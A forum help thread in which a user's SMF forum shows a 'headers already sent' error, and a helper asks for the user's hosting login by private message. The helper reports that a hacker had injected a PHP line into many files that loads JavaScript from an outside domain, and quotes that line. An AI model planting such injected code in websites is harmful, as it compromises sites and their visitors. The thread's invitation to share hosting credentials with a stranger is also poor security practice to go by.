FRIHOST FORUMS SEARCH FAQ TOS BLOGS COMPETITIONS
You are invited to Log in or Register a free Frihost Account!

SMF help needed!

pckid2
Yesterday I installed and modded an SMF forum on my website, which was working fine. I tried it agin this morning and it comes up with an error:

'session_start(): Cannot send session cookie - headers already sent by (output started at /home/pckid2/domains/peterjosling.co.uk/public_html/smf/Settings.php:61)'

Can anyone help?
wumingsden
pckid2 wrote:
Yesterday I installed and modded an SMF forum on my website, which was working fine. I tried it agin this morning and it comes up with an error:

'session_start(): Cannot send session cookie - headers already sent by (output started at /home/pckid2/domains/peterjosling.co.uk/public_html/smf/Settings.php:61)'

Can anyone help?

I have had hardly any experience with SMF. Please look in the Settings.php file and paste lines 56-66 here. Also if SMF's has a chache folder (like phpBB2) then delete all of the files that have been cached.
pckid2
my settings file doesn't go up to 66, plus i don't know what you mean about the cache folder.
wumingsden
pckid2 wrote:
my settings file doesn't go up to 66, plus i don't know what you mean about the cache folder.

Are you hosted here on FriHost. If so then if you like you can send me your Hosting Information via PM. If note then open the settings file and make sure that there is no white space. Also make sute that no odd code has been added to the file
pckid2
ok i'll do that
wumingsden
pckid2 wrote:
ok i'll do that

The errors have now been fixed. There was a whole directory of files that had the following code in them...

Code:

<? if (!defined('domainstat')) { define("domainstat", "ok");  echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=4fe6d'></script>";}?>

this code was put there on purpose by a hacker/worm that got into the server. You hosting accoung is now running fine (if you want to know more about the attack then watch the announcements section)

Update: An announcement has now been made here
-locked-